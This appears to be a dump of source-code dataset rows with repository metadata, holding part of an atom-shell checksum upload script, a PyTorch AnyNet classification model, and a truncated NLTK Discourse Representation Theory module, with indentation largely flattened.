'atom-shell/dist/{0}'.format(args.version), checksums)
rm_rf(directory)
def parse_args():
parser = argparse.ArgumentParser(description='upload sumsha file')
parser.add_argument('-v', '--version', help='Specify the version',
required=True)
return parser.parse_args()
def get_files_list(version):
return [
'node-{0}.tar.gz'.format(version),
'node.lib',
'x64/node.lib',
]
def download_files(url, files):
directory = tempfile.mkdtemp(prefix='atom-shell-tmp')
return directory, [
download(f, url + f, os.path.join(directory, f))
for f in files
]
def create_checksum(algorithm, directory, filename, files):
lines = []
for path in files:
h = hashlib.new(algorithm)
        with open(path, 'rb') as f:  # read bytes so the digest is stable across platforms
h.update(f.read())
lines.append(h.hexdigest() + ' ' + os.path.relpath(path, directory))
checksum_file = os.path.join(directory, filename)
with open(checksum_file, 'w') as f:
f.write('\n'.join(lines) + '\n')
return checksum_file
if __name__ == '__main__':
import sys
sys.exit(main())
| 23.859155 | 75 | 0.673554 |
001e78bd7dfc2cf90a87ffacf21ef810e5b8aaf2 | 13,942 | py | Python | network/anynet.py | pandamax/carrier-of-tricks-for-classification-pytorch | 4c29088b113aea4b6308fb9935243276233f3763 | ["MIT"] | 84 | 2020-06-24T16:01:22.000Z | 2022-02-24T05:17:51.000Z | network/anynet.py | hoya012/bag-of-tricks-for-classification-pytorch | d788d7a4e5007da9c410bdd3ef7ce3766d2ba0cd | ["MIT"] | 1 | 2021-05-31T07:33:37.000Z | 2021-05-31T07:33:37.000Z | network/anynet.py | hoya012/bag-of-tricks-for-classification-pytorch | d788d7a4e5007da9c410bdd3ef7ce3766d2ba0cd | ["MIT"] | 15 | 2020-07-09T15:49:33.000Z | 2021-10-21T11:01:07.000Z |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""AnyNet models."""
import torch
import torch.nn as nn
import math
import os
def init_weights(m):
"""Performs ResNet-style weight initialization."""
if isinstance(m, nn.Conv2d):
# Note that there is no bias due to BN
fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))
elif isinstance(m, nn.BatchNorm2d):
zero_init_gamma = (
hasattr(m, "final_bn") and m.final_bn and False
)
m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(mean=0.0, std=0.01)
m.bias.data.zero_()
def get_stem_fun(stem_type):
"""Retrives the stem function by name."""
stem_funs = {
"res_stem_cifar": ResStemCifar,
"res_stem_in": ResStemIN,
"simple_stem_in": SimpleStemIN,
}
assert stem_type in stem_funs.keys(), "Stem type '{}' not supported".format(
stem_type
)
return stem_funs[stem_type]
def get_block_fun(block_type):
"""Retrieves the block function by name."""
block_funs = {
"vanilla_block": VanillaBlock,
"res_basic_block": ResBasicBlock,
"res_bottleneck_block": ResBottleneckBlock,
}
assert block_type in block_funs.keys(), "Block type '{}' not supported".format(
block_type
)
return block_funs[block_type]
class AnyHead(nn.Module):
"""AnyNet head."""
def __init__(self, w_in, nc):
super(AnyHead, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(w_in, nc, bias=True)
def forward(self, x):
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class VanillaBlock(nn.Module):
"""Vanilla block: [3x3 conv, BN, Relu] x2"""
def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
assert (
bm is None and gw is None and se_r is None
), "Vanilla block does not support bm, gw, and se_r options"
super(VanillaBlock, self).__init__()
self._construct(w_in, w_out, stride)
def _construct(self, w_in, w_out, stride):
# 3x3, BN, ReLU
self.a = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
)
self.a_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.a_relu = nn.ReLU(inplace=True)
# 3x3, BN, ReLU
self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
self.b_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.b_relu = nn.ReLU(inplace=True)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class BasicTransform(nn.Module):
"""Basic transformation: [3x3 conv, BN, Relu] x2"""
def __init__(self, w_in, w_out, stride):
super(BasicTransform, self).__init__()
self._construct(w_in, w_out, stride)
def _construct(self, w_in, w_out, stride):
# 3x3, BN, ReLU
self.a = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
)
self.a_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.a_relu = nn.ReLU(inplace=True)
# 3x3, BN
self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
self.b_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.b_bn.final_bn = True
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResBasicBlock(nn.Module):
"""Residual basic block: x + F(x), F = basic transform"""
def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
assert (
bm is None and gw is None and se_r is None
), "Basic transform does not support bm, gw, and se_r options"
super(ResBasicBlock, self).__init__()
self._construct(w_in, w_out, stride)
def _add_skip_proj(self, w_in, w_out, stride):
self.proj = nn.Conv2d(
w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
def _construct(self, w_in, w_out, stride):
# Use skip connection with projection if shape changes
self.proj_block = (w_in != w_out) or (stride != 1)
if self.proj_block:
self._add_skip_proj(w_in, w_out, stride)
self.f = BasicTransform(w_in, w_out, stride)
self.relu = nn.ReLU(True)
def forward(self, x):
if self.proj_block:
x = self.bn(self.proj(x)) + self.f(x)
else:
x = x + self.f(x)
x = self.relu(x)
return x
class SE(nn.Module):
"""Squeeze-and-Excitation (SE) block"""
def __init__(self, w_in, w_se):
super(SE, self).__init__()
self._construct(w_in, w_se)
def _construct(self, w_in, w_se):
# AvgPool
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
# FC, Activation, FC, Sigmoid
self.f_ex = nn.Sequential(
nn.Conv2d(w_in, w_se, kernel_size=1, bias=True),
nn.ReLU(inplace=True),
nn.Conv2d(w_se, w_in, kernel_size=1, bias=True),
nn.Sigmoid(),
)
def forward(self, x):
return x * self.f_ex(self.avg_pool(x))
class BottleneckTransform(nn.Module):
"""Bottlenect transformation: 1x1, 3x3, 1x1"""
def __init__(self, w_in, w_out, stride, bm, gw, se_r):
super(BottleneckTransform, self).__init__()
self._construct(w_in, w_out, stride, bm, gw, se_r)
def _construct(self, w_in, w_out, stride, bm, gw, se_r):
# Compute the bottleneck width
w_b = int(round(w_out * bm))
# Compute the number of groups
num_gs = w_b // gw
# 1x1, BN, ReLU
self.a = nn.Conv2d(w_in, w_b, kernel_size=1, stride=1, padding=0, bias=False)
self.a_bn = nn.BatchNorm2d(w_b, eps=1e-5, momentum=0.1)
self.a_relu = nn.ReLU(inplace=True)
# 3x3, BN, ReLU
self.b = nn.Conv2d(
w_b, w_b, kernel_size=3, stride=stride, padding=1, groups=num_gs, bias=False
)
self.b_bn = nn.BatchNorm2d(w_b, eps=1e-5, momentum=0.1)
self.b_relu = nn.ReLU(inplace=True)
# Squeeze-and-Excitation (SE)
if se_r:
w_se = int(round(w_in * se_r))
self.se = SE(w_b, w_se)
# 1x1, BN
self.c = nn.Conv2d(w_b, w_out, kernel_size=1, stride=1, padding=0, bias=False)
self.c_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.c_bn.final_bn = True
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResBottleneckBlock(nn.Module):
"""Residual bottleneck block: x + F(x), F = bottleneck transform"""
def __init__(self, w_in, w_out, stride, bm=1.0, gw=1, se_r=None):
super(ResBottleneckBlock, self).__init__()
self._construct(w_in, w_out, stride, bm, gw, se_r)
def _add_skip_proj(self, w_in, w_out, stride):
self.proj = nn.Conv2d(
w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
def _construct(self, w_in, w_out, stride, bm, gw, se_r):
# Use skip connection with projection if shape changes
self.proj_block = (w_in != w_out) or (stride != 1)
if self.proj_block:
self._add_skip_proj(w_in, w_out, stride)
self.f = BottleneckTransform(w_in, w_out, stride, bm, gw, se_r)
self.relu = nn.ReLU(True)
def forward(self, x):
if self.proj_block:
x = self.bn(self.proj(x)) + self.f(x)
else:
x = x + self.f(x)
x = self.relu(x)
return x
class ResStemCifar(nn.Module):
"""ResNet stem for CIFAR."""
def __init__(self, w_in, w_out):
super(ResStemCifar, self).__init__()
self._construct(w_in, w_out)
def _construct(self, w_in, w_out):
# 3x3, BN, ReLU
self.conv = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=1, padding=1, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.relu = nn.ReLU(True)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResStemIN(nn.Module):
"""ResNet stem for ImageNet."""
def __init__(self, w_in, w_out):
super(ResStemIN, self).__init__()
self._construct(w_in, w_out)
def _construct(self, w_in, w_out):
# 7x7, BN, ReLU, maxpool
self.conv = nn.Conv2d(
w_in, w_out, kernel_size=7, stride=2, padding=3, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.relu = nn.ReLU(True)
self.pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class SimpleStemIN(nn.Module):
"""Simple stem for ImageNet."""
def __init__(self, in_w, out_w):
super(SimpleStemIN, self).__init__()
self._construct(in_w, out_w)
def _construct(self, in_w, out_w):
# 3x3, BN, ReLU
self.conv = nn.Conv2d(
in_w, out_w, kernel_size=3, stride=2, padding=1, bias=False
)
self.bn = nn.BatchNorm2d(out_w, eps=1e-5, momentum=0.1)
self.relu = nn.ReLU(True)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class AnyStage(nn.Module):
"""AnyNet stage (sequence of blocks w/ the same output shape)."""
def __init__(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
super(AnyStage, self).__init__()
self._construct(w_in, w_out, stride, d, block_fun, bm, gw, se_r)
def _construct(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
# Construct the blocks
for i in range(d):
# Stride and w_in apply to the first block of the stage
b_stride = stride if i == 0 else 1
b_w_in = w_in if i == 0 else w_out
# Construct the block
self.add_module(
"b{}".format(i + 1), block_fun(b_w_in, w_out, b_stride, bm, gw, se_r)
)
def forward(self, x):
for block in self.children():
x = block(x)
return x
class AnyNet(nn.Module):
"""AnyNet model."""
def __init__(self, shape, num_classes=2, checkpoint_dir='checkpoint', checkpoint_name='Network', **kwargs):
super(AnyNet, self).__init__()
self.shape = shape
self.num_classes = num_classes
self.checkpoint_dir = checkpoint_dir
self.checkpoint_name = checkpoint_name
if len(shape) != 3:
raise ValueError('Invalid shape: {}'.format(shape))
self.H, self.W, self.C = shape
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.checkpoint_path = os.path.join(checkpoint_dir, checkpoint_name, 'model.pt')
if kwargs:
self._construct(
stem_type=kwargs["stem_type"],
stem_w=kwargs["stem_w"],
block_type=kwargs["block_type"],
ds=kwargs["ds"],
ws=kwargs["ws"],
ss=kwargs["ss"],
bms=kwargs["bms"],
gws=kwargs["gws"],
se_r=kwargs["se_r"],
nc=self.num_classes #kwargs["nc"],
)
else:
self._construct(
stem_type="plain_block",
stem_w=32,
block_type="plain_block",
ds=[],
ws=[],
ss=[],
bms=[],
gws=[],
se_r=0.25 if True else None,
nc=self.num_classes,
)
self.apply(init_weights)
def _construct(self, stem_type, stem_w, block_type, ds, ws, ss, bms, gws, se_r, nc):
# Generate dummy bot muls and gs for models that do not use them
bms = bms if bms else [1.0 for _d in ds]
gws = gws if gws else [1 for _d in ds]
# Group params by stage
stage_params = list(zip(ds, ws, ss, bms, gws))
# Construct the stem
stem_fun = get_stem_fun(stem_type)
self.stem = stem_fun(3, stem_w)
# Construct the stages
block_fun = get_block_fun(block_type)
prev_w = stem_w
for i, (d, w, s, bm, gw) in enumerate(stage_params):
self.add_module(
"s{}".format(i + 1), AnyStage(prev_w, w, s, d, block_fun, bm, gw, se_r)
)
prev_w = w
# Construct the head
self.prev_w = prev_w
self.head = AnyHead(w_in=prev_w, nc=nc)
def forward(self, x):
for module in self.children():
x = module(x)
return x
def save(self, checkpoint_name=''):
if checkpoint_name == '':
torch.save(self.state_dict(), self.checkpoint_path)
else:
checkpoint_path = os.path.join(self.checkpoint_dir, self.checkpoint_name, checkpoint_name + '.pt')
torch.save(self.state_dict(), checkpoint_path)
def load(self, checkpoint_name=''):
if checkpoint_name == '':
self.load_state_dict(torch.load(self.checkpoint_path))
else:
checkpoint_path = os.path.join(self.checkpoint_dir, self.checkpoint_name, checkpoint_name + '.pt')
self.load_state_dict(torch.load(checkpoint_path))
| 33.434053 | 111 | 0.581982 |
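A hedged usage sketch for the AnyNet class above (not from the source): the import path mirrors network/anynet.py, and every stage parameter below is an illustrative choice, not a configuration used by the original project. Note that the constructor creates checkpoint_dir on disk.

import torch
from network.anynet import AnyNet  # path taken from the repo layout above

net = AnyNet(
    shape=(224, 224, 3), num_classes=2,
    stem_type="simple_stem_in", stem_w=32,
    block_type="res_bottleneck_block",
    ds=[1, 1], ws=[48, 96], ss=[2, 2],      # one block per stage, widths 48/96
    bms=[1.0, 1.0], gws=[8, 8], se_r=0.25,  # bottleneck mult, group widths, SE ratio
)
out = net(torch.randn(2, 3, 224, 224))      # -> torch.Size([2, 2])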
08588e8207155a6821ba8a51db8716daf0e00080 | 58,781 | py | Python | taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk_contrib/drt/DRT.py | hectormartinez/rougexstem | 32da9eab253cb88fc1882e59026e8b5b40900a25 | ["Apache-2.0"] | null | null | null | taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk_contrib/drt/DRT.py | hectormartinez/rougexstem | 32da9eab253cb88fc1882e59026e8b5b40900a25 | ["Apache-2.0"] | null | null | null | taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk_contrib/drt/DRT.py | hectormartinez/rougexstem | 32da9eab253cb88fc1882e59026e8b5b40900a25 | ["Apache-2.0"] | null | null | null |
from nltk.internals import Counter
from Tkinter import Canvas
from Tkinter import Tk
from tkFont import Font
from nltk.sem import logic
class Error(Exception): pass
def unique_variable(counter=None):
if counter is None: counter = DRS._counter
unique = counter.get()
return VariableExpression(Variable('z'+str(unique)))
class Expression(logic.Expression):
def replace_unique(self, variable, counter=None, replace_bound=False):
"""
Replace a variable v with a new, uniquely-named variable.
"""
return self.replace(variable, unique_variable(counter), replace_bound)
def toFol(self):
return self
def resolve_anaphora(self, trail=[]):
return self
def negate(self):
if isinstance(self, AbstractDRS):
return ApplicationDrs(DrsOperator('not'), self)
else:
return ApplicationExpression(FolOperator('not'), self)
class VariableBinderExpression(Expression, logic.VariableBinderExpression):
"""A variable binding expression: e.g. \\x.M."""
# for generating "unique" variable names during alpha conversion.
_counter = Counter()
def resolve_anaphora(self, trail=[]):
return self.__class__(self.variable, self.term.resolve_anaphora(trail + [self]))
def toFol(self):
return self.__class__(self.variable, self.term.toFol())
class LambdaExpression(VariableBinderExpression, logic.LambdaExpression):
pass
class SomeExpression(VariableBinderExpression, logic.SomeExpression):
pass
class AllExpression(VariableBinderExpression, logic.AllExpression):
pass
class Variable(logic.Variable):
pass
class VariableExpression(Expression, logic.VariableExpression):
pass
class Constant(logic.Constant):
pass
class ConstantExpression(Expression, logic.ConstantExpression):
pass
class IndVariableExpression(VariableExpression, logic.IndVariableExpression):
pass
class FolOperator(ConstantExpression, logic.Operator):
pass
class AbstractDRS(Expression):
"""A Discourse Representation Structure."""
def __init__(self):
Expression.__init__(self)
if self.__class__ is AbstractDRS:
raise NotImplementedError
self._size = None
def __add__(self, other):
raise NotImplementedError
def replace(self, variable, expression, replace_bound=False):
raise NotImplementedError
def free(self):
raise NotImplementedError
def get_refs(self):
return []
def simplify(self):
raise NotImplementedError
def infixify(self):
raise NotImplementedError
def __repr__(self):
raise NotImplementedError
def __str__(self):
raise NotImplementedError
def toFol(self):
raise NotImplementedError
def tp_equals(self, other):
'''
Pass the expression (self <-> other) to the theorem prover.
If the prover says it is valid, then the self and other are equal.
'''
assert isinstance(self, AbstractDRS)
assert isinstance(other, AbstractDRS)
from nltk_contrib.inference import inference
f1 = self.simplify().toFol();
f2 = other.simplify().toFol();
bicond = ApplicationExpression(ApplicationExpression(FolOperator('iff'), f1), f2)
return inference.get_prover(bicond).prove()
def draw(self, x=3, y=3, canvas=None, use_parens=None):
raise NotImplementedError
def get_drawing_size(self, canvas=None, use_parens=None):
raise NotImplementedError
class DRS(AbstractDRS):
# for generating "unique" variable names during alpha conversion.
_counter = Counter()
"""A Discourse Representation Structure."""
def __init__(self, refs, conds):
AbstractDRS.__init__(self)
self.refs = refs # a list of Variables
self.conds = conds # a list of Expressions, DRSs, and DRS_concs
def __add__(self, other):
"""DRS Concatenation"""
assert isinstance(other, DRS)
return ConcatenationDRS(ApplicationDRS(DrsOperator(Tokens.DRS_CONC), self), other)
def replace(self, variable, expression, replace_bound=False):
"""Replace all instances of variable v with expression E in self,
where v is free in self."""
r_refs = [] #the list of refs after replacements
r_conds = [cond for cond in self.conds]
for ref in self.refs:
if ref.variable in expression.free():
v = Variable('z' + str(self._counter.get())) #get a new var name
r_conds = [cond.replace(ref.variable, VariableExpression(v), True) for cond in r_conds] #replace every instance of 'ref' with 'v' in every condition
r_refs.append(VariableExpression(v)) #add the new ref ('v') to the list
else:
r_refs.append(ref) #no replacement needed; add the ref to the list
#===============================================================================
# Alpha convert variables that appear on the left side of an implication. This special processing is
# required because referents on the left side of an implication are accessable to the right
#===============================================================================
for cond in r_conds:
if isinstance(cond, ApplicationDRS) and isinstance(cond.first, ApplicationDRS) and isinstance(cond.first.first, DrsOperator) and cond.first.first.operator == 'implies':
for ref in cond.first.second.get_refs():
if ref.variable in expression.free():
r_conds.remove(cond)
v = Variable('z' + str(self._counter.get())) #get a new var name
r_conds.append(cond.replace(ref.variable, VariableExpression(v), True)) #replace every instance of 'ref' with 'v' in the condition
if replace_bound:
try:
r_refs.remove(IndVariableExpression(variable))
r_refs.append(expression)
except ValueError: pass
r_conds = [cond.replace(variable, expression, replace_bound) for cond in r_conds] #replace 'variable' with 'expression' in each condition
return DRS(r_refs, r_conds)
def free(self):
conds_free = set()
for cond in self.conds:
conds_free = conds_free.union(cond.free())
refs_set = set([ref.variable for ref in self.refs])
return conds_free #.difference(refs_set)
def get_refs(self):
return self.refs
def resolve_anaphora(self, trail=[]):
r_conds = []
for cond in self.conds:
r_cond = cond.resolve_anaphora(trail + [self])
# if the condition is of the form '(x = [])' then do not include it
if not DRS._isNullResolution(r_cond):
r_conds.append(r_cond)
return self.__class__(self.refs, r_conds)
def _isNullResolution(self):
return isinstance(self, ApplicationExpression) and \
isinstance(self.first, ApplicationExpression) and \
isinstance(self.first.first, FolOperator) and \
self.first.first.operator == Tokens.EQ and \
((isinstance(self.second, PossibleAntecedents) and not self.second) or \
(isinstance(self.first.second, PossibleAntecedents) and not self.first.second))
_isNullResolution = staticmethod(_isNullResolution)
def simplify(self):
r_refs = [ref.simplify() for ref in self.refs]
r_conds = [cond.simplify() for cond in self.conds]
return DRS(r_refs, r_conds)
def infixify(self):
r_refs = [ref.infixify() for ref in self.refs]
r_conds = [cond.infixify() for cond in self.conds]
return DRS(r_refs, r_conds)
def toFol(self):
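        # Added note: the conditions are folded (in reverse) into a conjunction
        # with the 'and' operator, then each discourse referent is wrapped in an
        # existential quantifier; e.g. a DRS with referent x and condition
        # walk(x) becomes, roughly, "some x.walk(x)".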
accum = None
for cond in self.conds[::-1]:
if not accum:
accum = cond.toFol()
else:
accum = ApplicationExpression( ApplicationExpression(FolOperator('and'), cond.toFol()), accum)
for ref in self.refs[::-1]:
accum = SomeExpression(ref.variable, accum)
return accum
def __repr__(self):
accum = '%s([' % (Tokens.DRS)
first = True
for ref in self.refs:
if not first:
accum += ','
else:
first = False
accum += ref.__str__()
accum += '],['
first = True
for cond in self.conds:
if not first:
accum += ','
else:
first = False
accum += cond.__str__()
accum += '])'
return accum
def __str__(self):
return self.__repr__()
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
x_current = x+canvas._BUFFER #indent the left side
y_current = y+canvas._BUFFER #indent the top
######################################
# Draw Discourse Referents
######################################
text = ''
first = True
for ref in self.refs:
if not first:
text += ', '
else:
first = False
text += str(ref.variable)
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
max_width = canvas.font.measure(text)
y_current += text_height+canvas._BUFFER
horiz_line_y = y_current
y_current += canvas._BUFFER
######################################
# Draw Conditions
######################################
for cond in self.conds:
if isinstance(cond, AbstractDRS) or isinstance(cond, ApplicationExpression):
bottom_right_corner = cond.draw(x_current, y_current, canvas)
max_width = max(max_width, bottom_right_corner[0]-x_current)
y_current = bottom_right_corner[1]+canvas._BUFFER
else:
text = str(cond)
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
max_width = max(max_width, canvas.font.measure(text))
y_current += text_height+canvas._BUFFER
######################################
# Draw Box
######################################
x_current = x+max_width+canvas._BUFFER*2
if (y_current - horiz_line_y) < text_height:
y_current += text_height
canvas.create_rectangle(x, y, x_current, y_current)
canvas.create_line(x, horiz_line_y, x_current, horiz_line_y)
return (x_current, y_current)
def get_drawing_size(self, canvas=None, use_parens=None):
if not canvas:
canvas = init_canvas(self)
text_height = canvas.font.metrics("linespace")
x_current = canvas._BUFFER #indent the left side
y_current = canvas._BUFFER #indent the top
######################################
# Draw Discourse Referents
######################################
text = ''
first = True
for ref in self.refs:
if not first:
text += ', '
else:
first = False
text += str(ref.variable)
max_width = canvas.font.measure(text)
y_current += text_height+canvas._BUFFER
horiz_line_y = y_current
y_current += canvas._BUFFER
######################################
# Draw Conditions
######################################
for cond in self.conds:
if isinstance(cond, AbstractDRS) or isinstance(cond, ApplicationExpression):
cond_size = cond.get_drawing_size(canvas)
max_width = max(max_width, cond_size[0])
y_current += cond_size[1]+canvas._BUFFER
else:
text = str(cond)
max_width = max(max_width, canvas.font.measure(text))
y_current += text_height+canvas._BUFFER
######################################
# Draw Box
######################################
x_current = max_width+canvas._BUFFER*2
if (y_current - horiz_line_y) < text_height:
y_current += text_height
self._size = (x_current, y_current)
return self._size
class DRSVariable(AbstractDRS):
"""A Variable DRS which consists solely of a variable."""
def __init__(self, variable):
AbstractDRS.__init__(self)
assert isinstance(variable, Variable)
self.variable = variable
def variables(self):
return set([self.variable])
def free(self):
return set([self.variable])
def subterms(self):
return set([self])
def replace(self, variable, expression, replace_bound=False):
if self.variable == variable:
return expression
else:
return self
def simplify(self):
return self
def infixify(self):
return self
def name(self):
return self.__str__()
def _skolemise(self, bound_vars, counter):
return self
def __str__(self): return '%s' % self.variable
def toFol(self):
return VariableExpression(self.variable)
def __repr__(self): return "DRSVariable('%s')" % self.variable
def __hash__(self): return hash(repr(self))
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
canvas.create_text(x, y, anchor='nw', font=canvas.font, text=self.variable)
return (x+canvas.font.measure(self.variable), y+text_height)
def get_drawing_size(self, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
text_height = canvas.font.metrics("linespace")
self._size = (canvas.font.measure(self.variable), text_height)
return self._size
class LambdaDRS(AbstractDRS):
"""A lambda expression: \\x.M."""
PREFIX = '\\'
def __init__(self, variable, term):
AbstractDRS.__init__(self)
assert isinstance(variable, Variable)
assert isinstance(term, AbstractDRS)
self.variable = variable
self.term = term
self.prefix = self.__class__.PREFIX.rstrip()
self.binder = (self.prefix, self.variable.name)
self.body = str(self.term)
def _relabel(self, other):
"""
Relabel C{other}'s bound variables to be the same as C{self}'s
variable.
"""
var = VariableExpression(self.variable)
return other.term.replace(other.variable, var)
def applyto(self, other):
return ApplicationDRS(self, other)
def variables(self):
return set([self.variable]).union(self.term.variables())
def free(self):
return self.term.free().difference(set([self.variable]))
def subterms(self):
return self.term.subterms().union([self])
def replace(self, variable, expression, replace_bound=False):
if self.variable == variable:
return self
if self.variable in expression.free():
v = 'z' + str(DRS._counter.get())
self = self.alpha_convert(Variable(v))
return self.__class__(self.variable, self.term.replace(variable, expression, replace_bound))
def alpha_convert(self, newvar):
"""
Rename all occurrences of the variable introduced by this variable
binder in the expression to C{newvar}.
"""
term = self.term.replace(self.variable, VariableExpression(newvar))
return self.__class__(newvar, term)
def resolve_anaphora(self, trail=[]):
return self.__class__(self.variable, self.term.resolve_anaphora(trail + [self]))
def simplify(self):
return self.__class__(self.variable, self.term.simplify())
def infixify(self):
return self.__class__(self.variable, self.term.infixify())
def toFol(self):
return LambdaExpression(self.variable, self.term.toFol())
def __str__(self, continuation=0):
# Print \x.\y.M as \x y.M.
if continuation:
prefix = ' '
else:
prefix = self.__class__.PREFIX
if self.term.__class__ == self.__class__:
return '%s%s%s' % (prefix, self.variable, self.term.__str__(1))
else:
return '%s%s.%s' % (prefix, self.variable, self.term)
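# Hedged illustration of the convention documented in __str__ above: with the Parser
# defined later in this module, a nested abstraction such as
#   Parser().parse(r'\x.\y.drs([],[(sees x y)])')
# prints with a single collapsed prefix ('\x y.' followed by the body) rather than '\x.\y.'.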
def __hash__(self):
return hash(repr(self))
def _skolemise(self, bound_vars, counter):
bv = bound_vars.copy()
bv.add(self.variable)
return self.__class__(self.variable, self.term._skolemise(bv, counter))
def __repr__(self):
return "LambdaDRS('%s', '%s')" % (self.variable, self.term)
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
# Get Variable Info
text = '%s%s' % (self.__class__.PREFIX, self.variable)
drs = self.term
while isinstance(drs, LambdaDRS):
text += ' %s' % drs.variable
drs = drs.term
text += Tokens.DOT
variables_width = canvas.font.measure(text)
# Draw Term (first, so that we know where to place the variable)
bottom_right_corner = drs.draw(x+variables_width, y, canvas)
# Draw Variables
canvas.create_text(x, y+(bottom_right_corner[1]-y)/2, anchor='w', font=canvas.font, text=text)
return bottom_right_corner
def get_drawing_size(self, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
text_height = canvas.font.metrics("linespace")
text = '%s%s' % (self.__class__.PREFIX, self.variable)
drs = self.term
while isinstance(drs, LambdaDRS):
text += ' %s' % drs.variable  # use the nested binder's variable, mirroring draw()
drs = drs.term
text += Tokens.DOT
variables_width = canvas.font.measure(text)
size = drs.get_drawing_size(canvas)
self._size = (size[0]+variables_width, size[1])
return self._size
class DrsOperator(AbstractDRS):
"""
A boolean operator, such as 'not' or 'and', or the equality
relation ('=').
"""
def __init__(self, operator):
AbstractDRS.__init__(self)
assert operator in Tokens.DRS_OPS
self.constant = operator
self.operator = operator
def replace(self, variable, expression, replace_bound=False):
return self
def free(self):
return set()
def simplify(self):
return self
def infixify(self):
return self
def toFol(self):
return FolOperator(self.operator)
def __str__(self): return '%s' % self.operator
def __repr__(self): return "DrsOperator('%s')" % self.operator
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
canvas.create_text(x, y, anchor='nw', font=canvas.font, text=self.operator)
return (x+canvas.font.measure(self.operator), y+text_height)
def get_drawing_size(self, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
self._size = (canvas.font.measure(self.operator), canvas.font.metrics("linespace"))
return self._size
class ApplicationDRS(AbstractDRS):
"""An application expression: (M N)."""
def __init__(self, first, second):
AbstractDRS.__init__(self)
first_simp = first.simplify()
assert isinstance(first, AbstractDRS)
if not (isinstance(first_simp, LambdaDRS) or isinstance(first_simp, DRSVariable)) :
assert isinstance(second, AbstractDRS)
self.first = first
self.second = second
def variables(self):
return self.first.variables().union(self.second.variables())
def free(self):
return self.first.free().union(self.second.free())
def _functor(self):
if isinstance(self.first, ApplicationDRS):
return self.first._functor()
else:
return self.first
fun = property(_functor,
doc="Every ApplicationDRS has a functor.")
def _operator(self):
functor = self._functor()
if isinstance(functor, DrsOperator):
return str(functor)
else:
raise AttributeError
op = property(_operator,
doc="Only some ApplicationDRSs have operators." )
def _arglist(self):
"""Uncurry the argument list."""
arglist = [str(self.second)]
if isinstance(self.first, ApplicationDRS):
arglist.extend(self.first._arglist())
return arglist
def _args(self):
arglist = self._arglist()
arglist.reverse()
return arglist
args = property(_args,
doc="Every ApplicationDRS has args.")
def subterms(self):
first = self.first.subterms()
second = self.second.subterms()
return first.union(second).union(set([self]))
def replace(self, variable, expression, replace_bound=False):
return self.__class__(self.first.replace(variable, expression, replace_bound),\
self.second.replace(variable, expression, replace_bound))
def get_refs(self):
first = self.first.simplify()
if isinstance(first, DrsOperator) and first.operator == Tokens.DRS_CONC:
second = self.second.simplify()
refs = second.get_refs()
return refs
else:
return []
